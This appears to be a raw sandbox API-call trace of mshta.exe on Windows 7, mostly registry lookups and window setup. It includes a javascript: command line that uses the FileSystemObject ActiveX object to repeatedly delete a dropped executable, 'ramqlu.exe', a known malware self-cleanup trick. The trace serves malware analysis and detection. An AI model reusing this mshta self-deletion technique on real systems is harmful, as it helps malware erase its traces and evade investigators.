Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x2cf318 | out: phkResult=0x2cf318*=0x98) returned 0x0 [0065.109] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x2cf31c | out: phkResult=0x2cf31c*=0x94) returned 0x0 [0065.109] RegOpenKeyExW (in: hKey=0x94, lpSubKey="FEATURE_ALLOW_EXPANDURI_BYPASS", ulOptions=0x0, samDesired=0x1, phkResult=0x2cf2d8 | out: phkResult=0x2cf2d8*=0x0) returned 0x2 [0065.109] RegOpenKeyExW (in: hKey=0x98, lpSubKey="FEATURE_ALLOW_EXPANDURI_BYPASS", ulOptions=0x0, samDesired=0x1, phkResult=0x2cf2d8 | out: phkResult=0x2cf2d8*=0x0) returned 0x2 [0065.110] RegCloseKey (hKey=0x0) returned 0x6 [0065.110] RegCloseKey (hKey=0x0) returned 0x6 [0065.110] RegCloseKey (hKey=0x98) returned 0x0 [0065.110] RegCloseKey (hKey=0x94) returned 0x0 [0065.110] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x2cf318 | out: phkResult=0x2cf318*=0x94) returned 0x0 [0065.110] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x2cf31c | out: phkResult=0x2cf31c*=0x98) returned 0x0 [0065.110] RegOpenKeyExW (in: hKey=0x98, lpSubKey="FEATURE_BODY_SIZE_IN_EDITABLE_IFRAME_KB943245", ulOptions=0x0, samDesired=0x1, phkResult=0x2cf2d8 | out: phkResult=0x2cf2d8*=0x0) returned 0x2 [0065.110] RegOpenKeyExW (in: hKey=0x94, lpSubKey="FEATURE_BODY_SIZE_IN_EDITABLE_IFRAME_KB943245", ulOptions=0x0, samDesired=0x1, phkResult=0x2cf2d8 | out: phkResult=0x2cf2d8*=0x0) returned 0x2 [0065.110] RegCloseKey (hKey=0x0) returned 0x6 [0065.110] RegCloseKey (hKey=0x0) returned 0x6 [0065.110] RegCloseKey (hKey=0x94) returned 0x0 [0065.110] RegCloseKey (hKey=0x98) returned 0x0 [0065.111] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x2cf318 | out: phkResult=0x2cf318*=0x98) returned 0x0 [0065.111] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x2cf31c | out: phkResult=0x2cf31c*=0x94) returned 0x0 [0065.111] RegOpenKeyExW (in: hKey=0x94, lpSubKey="FEATURE_DATABINDING_SUPPORT", ulOptions=0x0, samDesired=0x1, phkResult=0x2cf2d8 | out: phkResult=0x2cf2d8*=0x0) returned 0x2 [0065.111] RegOpenKeyExW (in: hKey=0x98, lpSubKey="FEATURE_DATABINDING_SUPPORT", ulOptions=0x0, samDesired=0x1, phkResult=0x2cf2d8 | out: phkResult=0x2cf2d8*=0x0) returned 0x2 [0065.111] RegCloseKey (hKey=0x0) returned 0x6 [0065.111] RegCloseKey (hKey=0x0) returned 0x6 [0065.111] RegCloseKey (hKey=0x98) returned 0x0 [0065.111] RegCloseKey (hKey=0x94) returned 0x0 [0065.111] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x2cf318 | out: phkResult=0x2cf318*=0x94) returned 0x0 [0065.111] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x2cf31c | out: phkResult=0x2cf31c*=0x98) returned 0x0 [0065.112] RegOpenKeyExW (in: hKey=0x98, lpSubKey="FEATURE_ENFORCE_BSTR", ulOptions=0x0, samDesired=0x1, phkResult=0x2cf2d8 | out: phkResult=0x2cf2d8*=0x0) returned 0x2 [0065.112] RegOpenKeyExW (in: hKey=0x94, lpSubKey="FEATURE_ENFORCE_BSTR", ulOptions=0x0, samDesired=0x1, phkResult=0x2cf2d8 | out: phkResult=0x2cf2d8*=0x0) returned 0x2 [0065.112] RegCloseKey (hKey=0x0) returned 0x6 [0065.112] RegCloseKey (hKey=0x0) returned 0x6 [0065.112] RegCloseKey (hKey=0x94) returned 0x0 [0065.112] RegCloseKey (hKey=0x98) returned 0x0 [0065.112] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x2cf318 | out: phkResult=0x2cf318*=0x98) returned 0x0 [0065.112] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x2cf31c | out: phkResult=0x2cf31c*=0x94) returned 0x0 [0065.112] RegOpenKeyExW (in: hKey=0x94, lpSubKey="FEATURE_ENABLE_DYNAMIC_OBJECT_CACHING", ulOptions=0x0, samDesired=0x1, phkResult=0x2cf2d8 | out: phkResult=0x2cf2d8*=0x0) returned 0x2 [0065.112] RegOpenKeyExW (in: hKey=0x98, lpSubKey="FEATURE_ENABLE_DYNAMIC_OBJECT_CACHING", ulOptions=0x0, samDesired=0x1, phkResult=0x2cf2d8 | out: phkResult=0x2cf2d8*=0x0) returned 0x2 [0065.112] RegCloseKey (hKey=0x0) returned 0x6 [0065.113] RegCloseKey (hKey=0x0) returned 0x6 [0065.113] RegCloseKey (hKey=0x98) returned 0x0 [0065.113] RegCloseKey (hKey=0x94) returned 0x0 [0065.113] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0065.114] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x2cf318 | out: phkResult=0x2cf318*=0x98) returned 0x0 [0065.115] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x2cf31c | out: phkResult=0x2cf31c*=0x9c) returned 0x0 [0065.115] RegOpenKeyExW (in: hKey=0x9c, lpSubKey="FEATURE_LEGACY_TOSTRING_IN_COMPATVIEW", ulOptions=0x0, samDesired=0x1, phkResult=0x2cf2d8 | out: phkResult=0x2cf2d8*=0x0) returned 0x2 [0065.115] RegOpenKeyExW (in: hKey=0x98, lpSubKey="FEATURE_LEGACY_TOSTRING_IN_COMPATVIEW", ulOptions=0x0, samDesired=0x1, phkResult=0x2cf2d8 | out: phkResult=0x2cf2d8*=0x0) returned 0x2 [0065.115] RegCloseKey (hKey=0x0) returned 0x6 [0065.115] RegCloseKey (hKey=0x0) returned 0x6 [0065.115] RegCloseKey (hKey=0x98) returned 0x0 [0065.115] RegCloseKey (hKey=0x9c) returned 0x0 [0065.115] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x2cf318 | out: phkResult=0x2cf318*=0x9c) returned 0x0 [0065.115] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x2cf31c | out: phkResult=0x2cf31c*=0x98) returned 0x0 [0065.115] RegOpenKeyExW (in: hKey=0x98, lpSubKey="FEATURE_ENABLE_OM_SCREEN_ORIGIN_DISPLAY_PIXELS", ulOptions=0x0, samDesired=0x1, phkResult=0x2cf2d8 | out: phkResult=0x2cf2d8*=0x0) returned 0x2 [0065.116] RegOpenKeyExW (in: hKey=0x9c, lpSubKey="FEATURE_ENABLE_OM_SCREEN_ORIGIN_DISPLAY_PIXELS", ulOptions=0x0, samDesired=0x1, phkResult=0x2cf2d8 | out: phkResult=0x2cf2d8*=0x0) returned 0x2 [0065.116] RegCloseKey (hKey=0x0) returned 0x6 [0065.116] RegCloseKey (hKey=0x0) returned 0x6 [0065.116] RegCloseKey (hKey=0x9c) returned 0x0 [0065.116] RegCloseKey (hKey=0x98) returned 0x0 [0065.116] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x2cf318 | out: phkResult=0x2cf318*=0x98) returned 0x0 [0065.116] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x2cf31c | out: phkResult=0x2cf31c*=0x9c) returned 0x0 [0065.116] RegOpenKeyExW (in: hKey=0x9c, lpSubKey="FEATURE_RESTRICT_CRASH_RECOVERY_SAVE_KB978454", ulOptions=0x0, samDesired=0x1, phkResult=0x2cf2d8 | out: phkResult=0x2cf2d8*=0x0) returned 0x2 [0065.116] RegOpenKeyExW (in: hKey=0x98, lpSubKey="FEATURE_RESTRICT_CRASH_RECOVERY_SAVE_KB978454", ulOptions=0x0, samDesired=0x1, phkResult=0x2cf2d8 | out: phkResult=0x2cf2d8*=0x0) returned 0x2 [0065.116] RegCloseKey (hKey=0x0) returned 0x6 [0065.116] RegCloseKey (hKey=0x0) returned 0x6 [0065.116] RegCloseKey (hKey=0x98) returned 0x0 [0065.117] RegCloseKey (hKey=0x9c) returned 0x0 [0065.117] GetSystemMetrics (nIndex=68) returned 4 [0065.117] GetSystemMetrics (nIndex=69) returned 4 [0065.117] GetProfileIntA (lpAppName="windows", lpKeyName="DragDelay", nDefault=20) returned 0x14 [0065.117] GetSystemDefaultLCID () returned 0x409 [0065.118] GetVersionExW (in: lpVersionInformation=0x2cf27c*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x77c6e36c, dwMinorVersion=0x77c6e0d2, dwBuildNumber=0x7502afd8, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x2cf27c*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0065.118] GetUserDefaultUILanguage () returned 0x409 [0065.118] GetLocaleInfoW (in: Locale=0x409, LCType=0x58, lpLCData=0x2cf1cc, cchData=16 | out: lpLCData="\x03") returned 16 [0065.217] GetKeyboardLayoutList (in: nBuff=32, lpList=0x2cf1fc | out: lpList=0x2cf1fc) returned 1 [0065.217] GetSystemMetrics (nIndex=4096) returned 0 [0065.218] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x2cf320 | out: phkResult=0x2cf320*=0x9c) returned 0x0 [0065.218] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x2cf324 | out: phkResult=0x2cf324*=0x98) returned 0x0 [0065.218] RegOpenKeyExW (in: hKey=0x98, lpSubKey="FEATURE_CLEANUP_AT_FLS", ulOptions=0x0, samDesired=0x1, phkResult=0x2cf2e0 | out: phkResult=0x2cf2e0*=0x0) returned 0x2 [0065.218] RegOpenKeyExW (in: hKey=0x9c, lpSubKey="FEATURE_CLEANUP_AT_FLS", ulOptions=0x0, samDesired=0x1, phkResult=0x2cf2e0 | out: phkResult=0x2cf2e0*=0x0) returned 0x2 [0065.218] RegCloseKey (hKey=0x0) returned 0x6 [0065.218] RegCloseKey (hKey=0x0) returned 0x6 [0065.218] RegCloseKey (hKey=0x9c) returned 0x0 [0065.218] RegCloseKey (hKey=0x98) returned 0x0 [0065.218] GetModuleFileNameW (in: hModule=0x74af0000, lpFilename=0x2cf188, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\mshtml.dll" (normalized: "c:\\windows\\syswow64\\mshtml.dll")) returned 0x1e [0065.218] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x3e) returned 0x423de0 [0065.219] RegisterClipboardFormatA (lpszFormat="Embedded Object") returned 0xc00a [0065.219] RegisterClipboardFormatA (lpszFormat="Embed Source") returned 0xc00b [0065.219] RegisterClipboardFormatA (lpszFormat="Link Source") returned 0xc00d [0065.219] RegisterClipboardFormatA (lpszFormat="Link Source Descriptor") returned 0xc00f [0065.219] RegisterClipboardFormatA (lpszFormat="Object Descriptor") returned 0xc00e [0065.219] RegisterClipboardFormatA (lpszFormat="MS Forms CLSID") returned 0xc16c [0065.219] RegisterClipboardFormatA (lpszFormat="MS Forms Text") returned 0xc16d [0065.219] GetDC (hWnd=0x0) returned 0x100109eb [0065.219] SHCreateShellPalette (hdc=0x0) returned 0xe080283 [0065.219] GetPaletteEntries (in: hpal=0xe080283, iStart=0x0, cEntries=0x100, pPalEntries=0x7502a494 | out: pPalEntries=0x7502a494) returned 0x100 [0065.219] SHGetInverseCMAP (in: pbMap=0x75028a7c, cbMap=0x4 | out: pbMap=0x75028a7c) returned 0x0 [0065.219] GetDeviceCaps (hdc=0x100109eb, index=38) returned 32409 [0065.219] ReleaseDC (hWnd=0x0, hDC=0x100109eb) returned 1 [0065.219] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x20a) returned 0x42ea78 [0065.220] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x2000) returned 0x42f490 [0065.220] GetCurrentProcessId () returned 0x358 [0065.220] _vsnprintf (in: _DstBuf=0x2cf6cc, _MaxCount=0x16, _Format="%s%08lX", _ArgList=0x2cf394 | out: _DstBuf="#MSHTML#PERF#00000358") returned 21 [0065.220] OpenFileMappingA (dwDesiredAccess=0x2, bInheritHandle=0, lpName="#MSHTML#PERF#00000358") returned 0x0 [0065.220] GetVersionExW (in: lpVersionInformation=0x2cf3b0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x4136d0, dwMinorVersion=0x100, dwBuildNumber=0x42dc78, dwPlatformId=0x410000, szCSDVersion="A") | out: lpVersionInformation=0x2cf3b0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0065.221] GetModuleHandleW (lpModuleName="advapi32") returned 0x77710000 [0065.221] GetProcAddress (hModule=0x77710000, lpProcName="EventWrite") returned 0x77ca0c59 [0065.221] GetProcAddress (hModule=0x77710000, lpProcName="EventRegister") returned 0x77c7f6ba [0065.221] GetProcAddress (hModule=0x77710000, lpProcName="EventUnregister") returned 0x77c99241 [0065.221] EtwEventRegister () returned 0x0 [0065.221] EtwRegisterTraceGuidsW () returned 0x0 [0065.221] EtwRegisterTraceGuidsW () returned 0x0 [0065.221] EtwEventRegister () returned 0x0 [0065.222] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Program Files\\Microsoft Office\\Office14\\outllib.dll", lpdwHandle=0x2cf17c | out: lpdwHandle=0x2cf17c) returned 0x0 [0065.222] GetModuleHandleW (lpModuleName=0x0) returned 0x970000 [0065.222] GetModuleFileNameW (in: hModule=0x970000, lpFilename=0x2cf188, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\mshta.exe" (normalized: "c:\\windows\\syswow64\\mshta.exe")) returned 0x1d [0065.222] PathFindFileNameW (pszPath="C:\\Windows\\SysWOW64\\mshta.exe") returned="mshta.exe" [0065.224] GetCurrentProcessId () returned 0x358 [0065.224] GetCurrentProcessId () returned 0x358 [0065.227] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName="Local\\!PrivacIE!SharedMemory!Mutex") returned 0xbc [0065.227] GetLastError () returned 0xb7 [0065.227] CreateFileMappingW (hFile=0xffffffff, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x10, lpName="Local\\!PrivacIE!SharedMem!Counter") returned 0xc0 [0065.227] MapViewOfFile (hFileMappingObject=0xc0, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xa0000 [0065.296] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x761e88 | out: hHeap=0x760000) returned 1 [0065.296] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x760e78 | out: hHeap=0x760000) returned 1 [0065.296] RegCloseKey (hKey=0x42) returned 0x0 [0065.296] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76d30000 [0065.296] GetProcAddress (hModule=0x76d30000, lpProcName="RegisterApplicationRestart") returned 0x76d6b53c [0065.297] lstrlenA (lpString="\"javascript:o=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{o.DeleteFile('ramqlu.exe');close()}catch(e){}},10);\"") returned 141 [0065.297] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x11c) returned 0x761e88 [0065.297] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x412b42, cbMultiByte=-1, lpWideCharStr=0x761e88, cchWideChar=142 | out: lpWideCharStr="\"javascript:o=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{o.DeleteFile('ramqlu.exe');close()}catch(e){}},10);\"") returned 142 [0065.297] RegisterApplicationRestart (pwzCommandline="\"javascript:o=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{o.DeleteFile('ramqlu.exe');close()}catch(e){}},10);\"", dwFlags=0x0) returned 0x0 [0065.297] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x761e88 | out: hHeap=0x760000) returned 1 [0065.297] GetProcAddress (hModule=0x74af0000, lpProcName="RunHTMLApplication") returned 0x74b4e710 [0065.297] GetCommandLineW () returned="mshta.exe \"javascript:o=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{o.DeleteFile('ramqlu.exe');close()}catch(e){}},10);\"" [0065.298] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x120) returned 0x435358 [0065.298] OleInitialize (pvReserved=0x0) returned 0x0 [0065.640] IsWindow (hWnd=0x0) returned 0 [0065.640] RegisterClassW (lpWndClass=0x2cfa34) returned 0xc059 [0065.640] CreateWindowExW (dwExStyle=0x0, lpClassName="HTML Application Host Window Class", lpWindowName="", dwStyle=0x0, X=0, Y=0, nWidth=0, nHeight=0, hWndParent=0x0, hMenu=0x0, hInstance=0x970000, lpParam=0x75029680) returned 0x4015e [0065.641] NtdllDefWindowProc_W () returned 0x0 [0065.641] NtdllDefWindowProc_W () returned 0x1 [0065.642] NtdllDefWindowProc_W () returned 0x0 [0065.644] NtdllDefWindowProc_W () returned 0x0 [0065.644] CreateWindowExW (dwExStyle=0x40000, lpClassName="HTML Application Host Window Class", lpWindowName="", dwStyle=0x2cf0000, X=-2147483648, Y=-2147483648, nWidth=-2147483648, nHeight=-2147483648, hWndParent=0x4015e, hMenu=0x0, hInstance=0x970000, lpParam=0x75029680) returned 0x3017c [0065.644] NtdllDefWindowProc_W () returned 0x0 [0065.644] NtdllDefWindowProc_W () returned 0x1 [0065.644] NtdllDefWindowProc_W () returned 0x0 [0065.645] NtdllDefWindowProc_W () returned 0x0 [0065.645] SetWindowLongW (hWnd=0x3017c, nIndex=-16, dwNewLong=-2100363264) returned 114229248 [0065.645] NtdllDefWindowProc_W () returned 0x0 [0065.645] NtdllDefWindowProc_W () returned 0x0 [0065.646] NtdllDefWindowProc_W () returned 0x0 [0065.646] NtdllDefWindowProc_W () returned 0x0 [0065.646] NtdllDefWindowProc_W () returned 0x0 [0065.646] NtdllDefWindowProc_W () returned 0x0 [0065.646] SetWindowPos (hWnd=0x3017c, hWndInsertAfter=0xfffffffe, X=0, Y=0, cx=0, cy=0, uFlags=0x37) returned 1 [0065.646] NtdllDefWindowProc_W () returned 0x0 [0065.646] NtdllDefWindowProc_W () returned 0x0 [0065.647] NtdllDefWindowProc_W () returned 0x0 [0065.647] NtdllDefWindowProc_W () returned 0x0 [0065.648] NtdllDefWindowProc_W () returned 0x0 [0065.648] SendMessageW (hWnd=0x3017c, Msg=0x127, wParam=0x3, lParam=0x0) returned 0x0 [0065.648] NtdllDefWindowProc_W () returned 0x0 [0065.648] NtdllDefWindowProc_W () returned 0x0 [0065.649] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x120) returned 0x43b440 [0065.649] PathRemoveArgsW (in: pszPath="\"javascript:o=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{o.DeleteFile('ramqlu.exe');close()}catch(e){}},10);\"" | out: pszPath="\"javascript:o=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{o.DeleteFile('ramqlu.exe');close()}catch(e){}},10);\"") [0065.649] PathRemoveBlanksW (in: pszPath="\"javascript:o=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{o.DeleteFile('ramqlu.exe');close()}catch(e){}},10);\"" | out: pszPath="\"javascript:o=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{o.DeleteFile('ramqlu.exe');close()}catch(e){}},10);\"") [0065.649] PathUnquoteSpacesW (in: lpsz="\"javascript:o=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{o.DeleteFile('ramqlu.exe');close()}catch(e){}},10);\"" | out: lpsz="javascript:o=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{o.DeleteFile('ramqlu.exe');close()}catch(e){}},10);") returned 1 [0065.649] CreateURLMonikerEx (in: pMkCtx=0x0, szURL="javascript:o=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{o.DeleteFile('ramqlu.exe');close()}catch(e){}},10);", ppmk=0x2cfa94*=0x0, dwFlags=0x1 | out: ppmk=0x2cfa94*=0x4206a8) returned 0x0 [0065.668] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x43b440 | out: hHeap=0x410000) returned 1 [0065.668] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x10) returned 0x43f818 [0065.669] CoCreateInstance (in: rclsid=0x74c29770*(Data1=0x3050f5c8, Data2=0x98b5, Data3=0x11cf, Data4=([0]=0xbb, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xbd, [6]=0xce, [7]=0xb)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x74cab75c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x750296d4 | out: ppv=0x750296d4*=0x442fc8) returned 0x0 [0065.670] DllGetClassObject (in: rclsid=0x441240*(Data1=0x3050f5c8, Data2=0x98b5, Data3=0x11cf, Data4=([0]=0xbb, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xbd, [6]=0xce, [7]=0xb)), riid=0x7666ee84*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x2ced44 | out: ppv=0x2ced44*=0x75028cb0) returned 0x0 [0065.671] IClassFactory:CreateInstance (in: This=0x75028cb0, pUnkOuter=0x0, riid=0x2cf6f0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x2ced30 | out: ppvObject=0x2ced30*=0x442fc8) returned 0x0 [0065.671] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x2a8) returned 0x442b48 [0065.775] GetCurrentThreadId () returned 0x90 [0065.885] RegisterClassExW (param_1=0x2cebdc) returned 0xc16a [0065.886] CreateWindowExW (dwExStyle=0x0, lpClassName=0xc16a, lpWindowName=0x0, dwStyle=0x80000000, X=0, Y=0, nWidth=0, nHeight=0, hWndParent=0x0, hMenu=0x0, hInstance=0x74af0000, lpParam=0x0) returned 0x202ae [0065.886] GetWindowLongW (hWnd=0x202ae, nIndex=-20) returned 0 [0065.886] NtdllDefWindowProc_W () returned 0x1 [0065.886] NtdllDefWindowProc_W () returned 0x0 [0065.886] NtdllDefWindowProc_W () returned 0x0 [0065.886] NtdllDefWindowProc_W () returned 0x0 [0065.887] NtdllDefWindowProc_W () returned 0x0 [0065.887] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x10) returned 0x43f830 [0065.887] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x10) returned 0x43f848 [0065.887] CreateCompatibleDC (hdc=0x0) returned 0x100109d1 [0065.887] GetDeviceCaps (hdc=0x100109d1, index=90) returned 96 [0065.887] GetDeviceCaps (hdc=0x100109d1, index=88) returned 96 [0065.887] GetSystemMetrics (nIndex=68) returned 4 [0065.887] GetSystemMetrics (nIndex=69) returned 4 [0065.887] GetSystemMetrics (nIndex=2) returned 17 [0065.887] GetSystemMetrics (nIndex=3) returned 17 [0065.887] GetStockObject (i=13) returned 0x18a002e [0065.887] SelectObject (hdc=0x100109d1, h=0x18a002e) returned 0x18a002e [0065.887] GetTextMetricsW (in: hdc=0x100109d1, lptm=0x2cec74 | out: lptm=0x2cec74) returned 1 [0065.888] SelectObject (hdc=0x100109d1, h=0x18a002e) returned 0x18a002e [0065.888] DeleteObject (ho=0x18a002e) returned 1 [0065.888] GetSystemDefaultLCID () returned 0x409 [0065.888] GetUserDefaultLCID () returned 0x409 [0065.888] GetACP () returned 0x4e4 [0065.888] GetLocaleInfoW (in: Locale=0x400, LCType=0x1014, lpLCData=0x2cebe8, cchData=41 | out: lpLCData="1") returned 2 [0065.888] _wtoi (_String="1") returned 1 [0065.888] RegCloseKey (hKey=0x0) returned 0x6 [0065.888] GetLocaleInfoW (in: Locale=0x400, LCType=0x13, lpLCData=0x2cec3c, cchData=16 | out: lpLCData="0123456789") returned 11 [0065.888] SystemParametersInfoW (in: uiAction=0x46, uiParam=0x0, pvParam=0x7502b038, fWinIni=0x0 | out: pvParam=0x7502b038) returned 1 [0065.888] SystemParametersInfoW (in: uiAction=0x42, uiParam=0xc, pvParam=0x2cecb0, fWinIni=0x0 | out: pvParam=0x2cecb0) returned 1 [0065.888] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xc0) returned 0x442f00 [0065.888] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x10) returned 0x43f860 [0065.888] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xa4) returned 0x43e3c8 [0065.889] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x14) returned 0x4334b8 [0065.889] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x1c) returned 0x43abd0 [0065.889] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x44) returned 0x4291d0 [0065.889] GetSystemWindowsDirectoryW (in: lpBuffer=0x2ceabc, uSize=0x104 | out: lpBuffer="C:\\Windows") returned 0xa [0065.889] lstrlenW (lpString="C:\\Windows") returned 10 [0065.889] lstrlenW (lpString="\\WindowsShell.manifest") returned 22 [0065.889] CreateActCtxW (pActCtx=0x2cea98) returned 0x43e47c [0065.891] ActivateActCtx (in: hActCtx=0x43e47c, lpCookie=0x2cea68 | out: hActCtx=0x43e47c, lpCookie=0x2cea68) returned 1 [0065.891] LoadLibraryW (lpLibFileName="comctl32.dll") returned 0x754a0000 [0065.989] DeactivateActCtx (dwFlags=0x0, ulCookie=0x1fad0001) returned 1 [0065.989] GetProfileIntA (lpAppName="windows", lpKeyName="DragScrollInset", nDefault=11) returned 0xb [0065.990] GetProfileIntA (lpAppName="windows", lpKeyName="DragScrollDelay", nDefault=50) returned 0x32 [0065.990] GetProfileIntA (lpAppName="windows", lpKeyName="DragDelay", nDefault=200) returned 0xc8 [0065.990] GetProfileIntA (lpAppName="windows", lpKeyName="DragScrollInterval", nDefault=50) returned 0x32 [0065.990] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x2ce6c8, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\mshta.exe" (normalized: "c:\\windows\\syswow64\\mshta.exe")) returned 0x1d [0065.991] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x2ce8d0, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\mshta.exe" (normalized: "c:\\windows\\syswow64\\mshta.exe")) returned 0x1d [0065.991] GetCurrentProcess () returned 0xffffffff [0065.991] GetModuleBaseNameW (in: hProcess=0xffffffff, hModule=0x0, lpBaseName=0x2cead8, nSize=0x104 | out: lpBaseName="mshta.exe") returned 0x9 [0065.991] PathFindFileNameW (pszPath="C:\\Windows\\SysWOW64\\mshta.exe") returned="mshta.exe" [0065.991] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x14) returned 0x4334d8 [0065.991] FindAtomW (lpString="TridentEnableHiRes") returned 0x0 [0065.991] SHGetValueW (in: hkey=0x80000001, pszSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer", pszValue="NoFileMenu", pdwType=0x2ce6b4, pvData=0x2ce6c0, pcbData=0x2ce6bc*=0x4 | out: pdwType=0x2ce6b4*=0x0, pvData=0x2ce6c0, 